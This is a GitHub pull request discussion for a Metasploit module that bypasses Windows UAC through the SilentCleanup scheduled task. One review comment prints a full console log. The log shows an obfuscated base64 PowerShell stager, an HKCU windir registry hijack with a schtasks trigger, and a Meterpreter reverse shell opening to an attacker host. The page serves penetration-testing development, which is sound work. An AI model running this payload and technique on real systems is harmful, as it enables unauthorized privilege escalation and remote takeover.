Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Add SilentCleanup UAC Bypass module #11997

Merged
merged 10 commits into from Jun 27, 2019

Conversation

Projects
None yet
6 participants
@cbrnrd
Copy link
Contributor

commented Jun 20, 2019

This PR adds a module that bypasses UAC via the "SilentCleanup" task in Windows Task Scheduler

Verification

List the steps needed to make sure this thing works

  • Start msfconsole
  • Get a session
  • use exploit/windows/smb/local/bypassuac_silentcleanup
  • set session 1
  • run
  • Get an elevated session

TODO

  • Getting it to work
    I have tried for days but I cannot figure out the proper configuration for cmd_psh_payload to work when in a PS1 context. Any help would be greatly appreciated.
    Thanks @NickTyrer!
  • Docs (ping @h00die)

References

https://forums.hak5.org/topic/45439-powershell-real-uac-bypass/
https://www.youtube.com/watch?v=C9GfMfFjhYI&t=432s

@NickTyrer

This comment has been minimized.

Copy link
Contributor

commented Jun 20, 2019

@cbrnrd I added:
'Arch' => [ARCH_X86, ARCH_X64],
'Targets' => [['Microsoft Windows', {}]],
to allow me to use 64bit payloads and the module worked fine.

@cbrnrd

This comment has been minimized.

Copy link
Contributor Author

commented Jun 20, 2019

@NickTyrer
You are my god

cbrnrd added some commits Jun 20, 2019

@cbrnrd cbrnrd changed the title WIP: Create SilentCleanup UAC Bypass module Add SilentCleanup UAC Bypass module Jun 20, 2019

cbrnrd added some commits Jun 20, 2019

@wvu-r7
Copy link
Contributor

left a comment

Thanks for the contribution, @cbrnrd! I have completed my first pass of review, but there are some questions that need to be answered. Thanks!

@wvu-r7 wvu-r7 self-assigned this Jun 22, 2019

@wvu-r7

wvu-r7 approved these changes Jun 26, 2019

Copy link
Contributor

left a comment

Testing. :)

Fix missing is_in_admin_group? method
This was missed in the refactor, since admin_group was removed.
@wvu-r7

This comment has been minimized.

Copy link
Contributor

commented Jun 27, 2019

Fixed NameError from refactor. Clean run after:

msf5 exploit(windows/local/bypassuac_silentcleanup) > run

[*] Started reverse TCP handler on 192.168.56.1:4444
[+] Part of Administrators group! Continuing...
[*] Powershell command length: 6591
[*] Uploading payload PS1...
[*]
      if((([System.Security.Principal.WindowsIdentity]::GetCurrent()).groups -match "S-1-5-32-544")) {
        powershell.exe -nop -w hidden -noni -e aQBmACgAWwBJAG4AdABQAHQAcgBdADoAOgBTAGkAegBlACAALQBlAHEAIAA0ACkAewAkAGIAPQAkAGUAbgB2ADoAdwBpAG4AZABpAHIAKwAnAFwAcwB5AHMAbgBhAHQAaQB2AGUAXABXAGkAbgBkAG8AdwBzAFAAbwB3AGUAcgBTAGgAZQBsAGwAXAB2ADEALgAwAFwAcABvAHcAZQByAHMAaABlAGwAbAAuAGUAeABlACcAfQBlAGwAcwBlAHsAJABiAD0AJwBwAG8AdwBlAHIAcwBoAGUAbABsAC4AZQB4AGUAJwB9ADsAJABzAD0ATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ARABpAGEAZwBuAG8AcwB0AGkAYwBzAC4AUAByAG8AYwBlAHMAcwBTAHQAYQByAHQASQBuAGYAbwA7ACQAcwAuAEYAaQBsAGUATgBhAG0AZQA9ACQAYgA7ACQAcwAuAEEAcgBnAHUAbQBlAG4AdABzAD0AJwAtAG4AbwBuAGkAIAAtAG4AbwBwACAALQB3ACAAaABpAGQAZABlAG4AIAAtAGMAIAAmACgAWwBzAGMAcgBpAHAAdABiAGwAbwBjAGsAXQA6ADoAYwByAGUAYQB0AGUAKAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAEkATwAuAFMAdAByAGUAYQBtAFIAZQBhAGQAZQByACgATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ASQBPAC4AQwBvAG0AcAByAGUAcwBzAGkAbwBuAC4ARwB6AGkAcABTAHQAcgBlAGEAbQAoACgATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ASQBPAC4ATQBlAG0AbwByAHkAUwB0AHIAZQBhAG0AKAAsAFsAUwB5AHMAdABlAG0ALgBDAG8AbgB2AGUAcgB0AF0AOgA6AEYAcgBvAG0AQgBhAHMAZQA2ADQAUwB0AHIAaQBuAGcAKAAnACcASAA0AHMASQBBAE0AdgByAEYARgAwAEMAQQA3AFYAVwBhADIAKwBiAFMAQgBUADkAbgBFAGoANQBEADYAaQB5AEIAQwBpAE8AagBWAE0AMwB6AFUAYQBxAHQASQBBAGgAeABqAFcASgBLAFQARgAyADcATABWAFcAQgBBAGEAWQBlAEgAZwBFAGgAdABpAGsAMgAvACsAKwBkADIAeABJAFUAegBXAHQAMgBwAFUAVwBJAFQARwBQACsAegB6ADMAegBGAHkAQwBNAHYARQBvAFQAaABPAHUAZgBOAEQAdgB1AGMAOQBIAGgAdwBjAFQATgAzAGQAagBUAG0AaAB0AGYAYQBQAE4AdABSADQAZgB4AEkATQBEAFcARwAyAGwAcwA1AGwAdQBjAGgAOAA0AFkAUwBsAG4AMgBTAEMATgBYAFoAeQBzAEwAaQA3AFUATQBzADkAUgBRAHYAZgB6AHoAaQBXAGkAYwBsAEcAZwArAEkANQBnAFYAQQBnAGkAOQB3ADgAMwBpADEAQwBPAFQAcQA3AHYANwBwAEYASAB1AGMAOQBjADYAKwAvAE8ASgBVAG4AdgBYAEYASwBMAFYAYQByAHIAUgBZAGcANwBrAFIATwBmADcAWQAxAFQAegAyAFgAQgBkAE8AeQBNAFkAQwByAHcAZgAvADMARgBpADgAdQBUADMAcQBxAGoAUABaAFEAdQBLAFEAVABlAHIAZwBxAEsANABvADUAUABDAEMAOQB5AFgAMABUAG0AOABLAGIASwBrAE0AQwBiADIATQB2AFQASQBnADEAbwBaADQAYQBUAHQANgBlAGQAYQBWAEsANABBAGIAbwBDAGEANAAvAEkAUgBEAFIASwAvAFkASQBYAEkAUQAxADQAYwAwAFQATABQAE8ASAAyAEMAVABFAEwAKwAzADIAQgBoACsARQBrAFQAegAzAFoAOQAzAE4AVQBGAEgAeQBiAFcAegBMAGIAeQA5AFgAcQBUADIARgBaAE8ALwA1AFUASgBoAFQASABxAEcATQBrAEYATwBWAHAAWgBxAFAAOABFAFgAdQBvADYAQQB6AGQAeABDAGYAbwBFAHcAcABXAG8ARwBYAFQASABDAGYAaABTAGgAUgBCADcARABGAGQASQA2AEcAVgBsAEkAUwAwAHUAZAA4AHgASQAxAHkAaABUAFEAUABiAHIAeQBvAEoATAA1AFYAQQBhAGsASgB6AHMAUQAyAEYAZgBDADEAUgBNAC8AVgBMAGcAdgBhAHEALwBDAHUAUgBzAHUAcQBMADgATwB3AFoAQQBNAGgAOQBPAFQAbwA4AE8AZwB3AGEAcwB2AGgAUABMADYAawBDAG8ANABQAGwAYgBvAHcAZwBOAEcARwBTAEYAbgBnAG4AOQBZAEcAVAAyAHAAdwBKAFAAbAB5AGEANQBoAFYATQBXAHoAZAA1AGkAYwBUAFYATQA3AEIAYwB5ADgAMgBpADkAbwAvAFYAZQA0ADAAcwBTAFAAcABCAHAAcwBEAFMAMABrAG0AeAB2AHcASwBWAHUAcABxAHQAYwBuAEUAMgAwAGQAagBHAGoAMgBrADUAUQBBAEYATwAwAEsAQgBLADMAQgBoADcARABmAE8ARQAxAHkAQgBHAEEAVQBHADcARABEAHUATgAyAEIAVgBFAEoAZgBEADEAQgB2AEkASABpAEsARABRAHAAUQB3AHoAVgB1AG4AdgAxAEwAUQBZADAAMgBkAGQAcABjAFQARQBSADcAbgBzAFEAWgBrAEsAaQBBAG8AcQBLAEgANABiAHoATAA0AE0AQQBtADgAawBKAG8AbwBCAG8ALwAwAGMAcQBOAGMASwBnAE8AKwBvAGsAYQA0ADUAWABqAFgAZQAyAFIAeQBFAGUASgBXADQAUgBkAEgAbQBKAGkAVQBjAE8ASwAvAE4AMgBjAGcAbAB5AEcAOQB6AGMAbABMAGcAZQBrAHMAdQBhAGIAbwBiADgAbAAvAEQATgBVAHQAQwBzAGUAYwBXAHQARABHADMARQBwACsAQgByAEIAMgBxAGEAVgBMAFEAdgBQAFMAZwBiAHAARAA4AGoAWgAwAGgARAA3AHUARQBZAGQASABtAGgAdABoAEgAUwBtAFgAagBzAEgASABNAHYANABxAEUANgBoAEkAQwB4AHcAQQBzAFAAVQBJAGwAWQBJAFUAaABZAEYAUABHAGgAaAB4AGkAWgBKAFUAWABPAHoAYQBpAFIAcAB3AFIARgBJAFAASQA3AHUAVAByAHgAQQAzAGgAbgBOAGQAYwAzADcASABIAEQAWgBIAFAAZgB4AGQAaAB3ACsAVQA5AGMAUgBrAFkARABRAG8AdgA0AG8ATQBLADIAeQBTAGwAYgBjADcAQgBPAFkAVQBiAGgAQQBIAEwAZQBQAFMAZgAzAEwAKwA0AE8AdgBhAEIAcQBEAG0AcQBhAHkARQAwAEIAMgBTAHAAVgBKAFEAUgB1ADUAVQBzAEoAbwB5AFQATgBTAHcANwBFAEgASQBLAEEATwBoADUARwBpAHQAdQBnAGMANwA2ACsAMQB0AEMAZQBOAFAAVgA4AE8ARABkAFoASgBBACsAeQBmAEIAbwArAGkAZgBMAFUAZQB5AHAAcwB6AEIATQBmADAAUgBzAGcAOQBxADMARwBoADUAUABvADgAagBBAFAAUwBPAEUAZQBUAFgAVgB3AGcAbQBWAHMAbwA4ADMATgA4AE8AUgBQAFIAagBLACsAVwBBAGIAQgBiAEoAUgBHAE4AcABRAHEAYQB5AGUASQBuAHQARAAvAE4ANABaAEsAZABNAHAANgBHAEYAMQBiAE4AMQB2AEQAZABsAFgANABuAEEAZQAzAHEAbwBiAFkAeABMAE4ARABYAEMAawBqAGsATQBqAGgASwA5AGkAUgBKADQAaQBMAGEAUgBRAGsAWABSADEAYgBDAHUAUgBoAGkAVQA1AHQASwAyAGgAMQBlADgAdABqAE8ANAA1AFUAZgBDAFQAYgBkAGoAeQBjAFAAYgBzADcAOQBtAFAAMQB1ADgAUAA1ADkAcwBiACsAYwBvAGMAeQBaAEYAKwA3AGUAdQA5AFUAMwAyAG4AdgAyAGIANgBpAC8AWABsAGUASwBEAHQANQBoADYAYgBXADcAZQBGAGgAagBYAHcAbwArAG0AMwBsAGgATwBoAG0AWgBNAHAATQAwADEAZgBXAEUANQBtAGgATQBlAGIAMABIAEwARwAzAGIANABlAEsAYgBCAHUANABPADAANABzADcAdgB3ADkASABxAGoAeAA4AFIALwBNAHMAbgA1AGsAdwBuAGgAVwBzADUAaQBoAE4ASABDAEMARgBFAFYAeQBwAFkAcwAyADcAYwBKAHMAZQA4ADIAcQBxAHoAbwAzAHUAWgBqADIASgBlAG4AKwBoAFQAVwAxAGoAZABHAHMAcgBYAHUATQB0AE8AdgBiAG8AZgBkAFAAeAB3AFQAbwB5AHkAVgBMAFUAMgBXAGQAUQBKAG4ATQBwAGIAZAB6AGEARABiAG0ANgBXAEsANQBiAHkAegBwAHAAcQAwAHIAYQBiAFMAZABxAFAAZABkAHoAYwBhAEgAbQAzAFcAOQBYAGQANgBlAFgAWQBXAGQAbwBQACsAcABPAHYAWQBSAGoASgAwAEkAdwBYAGkAcgBVAGIAOQBOAFIANABkAHcAMQA3AHMATwB0AEoAdAAwAEgAVQBZAGYAZwBNAHQANgBUADQAbABjACsASgBPADEARgA1AEsANwByAHEAOQBLAFIANgA4AFYAeABRAEQAbwA5AEcAVgA2AFoARQBIAEIAWABJAEcARwArACsAcwB1ADEAUQA5ADkAYQBJAEEAWQBqAEwAQwBjAHkAdQBjAHAAOABtAHAAdQB3AGEANwBzADEAQwBHADYAQwBBAC8AcQBIAE0AdwBNAGsAQgBIAEsAUQBsAGUAVAA0AC8AbgB6AE4AWgBvAEkAOABXAGoAcgBjAFQAaQBqAEUAZgBuAEUATgB0AHAASABZAE4ATQBFADIAUABlAGgAZgBqAGsANABjAEIAVwBrADAAdgBiAG0ASgAvADYAUwBGAGUANgB4ADkANgBIAE4ANAB5AHoAUQBOAHAAVwB2AHIAMQArAFEAYwBVAGYAZABSAEgAVAB6AFkAdgBJAEoAVQBCAFIANgBBADcATgB4AGEAQwBuAHUAVgA1AGYAKwBaAE0AVQBNAHcAMQBCADIAUAAwAG4AcgBGAEcAZQBJAEEASgA5AEYAagBwAHgAYwA3AGgAawBRAGwASwBQAE4AUgB4AG8ARAB0AEQAcQA5AGcAMgBJADkAYwBNAHAARABOACsAZQB2AGoAbwBTAHUAVwBkAEIAOABXAHMAWABhAHAAWQB1AEwAaABZAFEASQB4AHgAVwBPAEUAMgBkAE0AVQBwAEMARwByAFcAbAA3AFYAdABKAGcAcgBZAGkAYgBmAHMAUwBaAFAAagByAGEAYQBsAHAAVgBnAG4ATQBVAHAAdAAxAEoAWQBaAEsAYgBaAGoAcwBEAEkAdgBzACsATQBLAHQANgAvADIALwBXAE4AVgAzAFIAZwBRAGYALwArAGQAWQBmAFYAMwA3AHkAZQA0AHYANABTAGUAMQBkADkAbAArAHQALwByAHQAdwBtACsAQgArAGQAdAA1AHoAMQB4AE0AUQBkAEsARwBLADQAKwBnAGYAZABOADkATABmADIAYQBGAFMAOQArAFMASwBBAGkAVQBQAE8AZwBmAHQAZwB2ADUAWABWAEoAVAA2ADcAZwBOACsAWABvADgARgArAGsAeQBBAG0AdgB2AEEAbwBBAEEAQQA9AD0AJwAnACkAKQApACwAWwBTAHkAcwB0AGUAbQAuAEkATwAuAEMAbwBtAHAAcgBlAHMAcwBpAG8AbgAuAEMAbwBtAHAAcgBlAHMAcwBpAG8AbgBNAG8AZABlAF0AOgA6AEQAZQBjAG8AbQBwAHIAZQBzAHMAKQApACkALgBSAGUAYQBkAFQAbwBFAG4AZAAoACkAKQApACcAOwAkAHMALgBVAHMAZQBTAGgAZQBsAGwARQB4AGUAYwB1AHQAZQA9ACQAZgBhAGwAcwBlADsAJABzAC4AUgBlAGQAaQByAGUAYwB0AFMAdABhAG4AZABhAHIAZABPAHUAdABwAHUAdAA9ACQAdAByAHUAZQA7ACQAcwAuAFcAaQBuAGQAbwB3AFMAdAB5AGwAZQA9ACcASABpAGQAZABlAG4AJwA7ACQAcwAuAEMAcgBlAGEAdABlAE4AbwBXAGkAbgBkAG8AdwA9ACQAdAByAHUAZQA7ACQAcAA9AFsAUwB5AHMAdABlAG0ALgBEAGkAYQBnAG4AbwBzAHQAaQBjAHMALgBQAHIAbwBjAGUAcwBzAF0AOgA6AFMAdABhAHIAdAAoACQAcwApADsA
      } else {
          $registryPath = "HKCU:\Environment"
          $Name = "windir"
          $Value = "powershell -ExecutionPolicy bypass -windowstyle hidden -Command `"& `'$PSCommandPath`'`";#"
          Set-ItemProperty -Path $registryPath -Name $name -Value $Value
          #Depending on the performance of the machine, some sleep time may be required before or after schtasks
          Start-Sleep -Milliseconds 0
          schtasks /run /tn \Microsoft\Windows\DiskCleanup\SilentCleanup /I | Out-Null
          Remove-ItemProperty -Path $registryPath -Name $name
      }

[+] Payload uploaded to C:\Windows\TEMP\PbHjYLmP.ps1
[*] Sending stage (206403 bytes) to 192.168.56.105
[*] Meterpreter session 2 opened (192.168.56.1:4444 -> 192.168.56.105:49159) at 2019-06-27 11:16:14 -0500
[+] Deleted C:\Windows\TEMP\PbHjYLmP.ps1
[-] Exploit failed [user-interrupt]: Rex::TimeoutError Operation timed out.
[-] run: Interrupted
msf5 exploit(windows/local/bypassuac_silentcleanup) >
@wvu-r7

This comment has been minimized.

Copy link
Contributor

commented Jun 27, 2019

I added @enigma0x3 as an independent discoverer. The added https://enigma0x3.net/2016/07/22/bypassing-uac-on-windows-10-using-disk-cleanup/ reference should be helpful, though unrelated to this particular vector. I also fixed a typo where byshone69 should be nyshone69. :-)

@wvu-r7

This comment has been minimized.

Copy link
Contributor

commented Jun 27, 2019

Also, I love unquoted paths. Such classic behavior. :')

@wvu-r7 wvu-r7 merged commit 6f1aaac into rapid7:master Jun 27, 2019

1 of 3 checks passed

Metasploit Automation - Sanity Test Execution Running automation sanity tests. Details available on completion.
Details
continuous-integration/travis-ci/pr The Travis CI build is in progress
Details
Metasploit Automation - Test Execution Successfully completed all tests.
Details

wvu-r7 added a commit that referenced this pull request Jun 27, 2019

@wvu-r7

This comment has been minimized.

Copy link
Contributor

commented Jun 27, 2019

Landed after final changes. We can iterate on this going forward. Thanks, everyone!

msjenkins-r7 added a commit that referenced this pull request Jun 27, 2019

@wvu-r7

This comment has been minimized.

Copy link
Contributor

commented Jun 27, 2019

Release Notes

This adds a UAC bypass using an unquoted path in the SilentCleanup scheduled task for Windows.

@cbrnrd

This comment has been minimized.

Copy link
Contributor Author

commented Jun 27, 2019

Thanks for the final touch up's @wvu-r7 👏

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
You can’t perform that action at this time.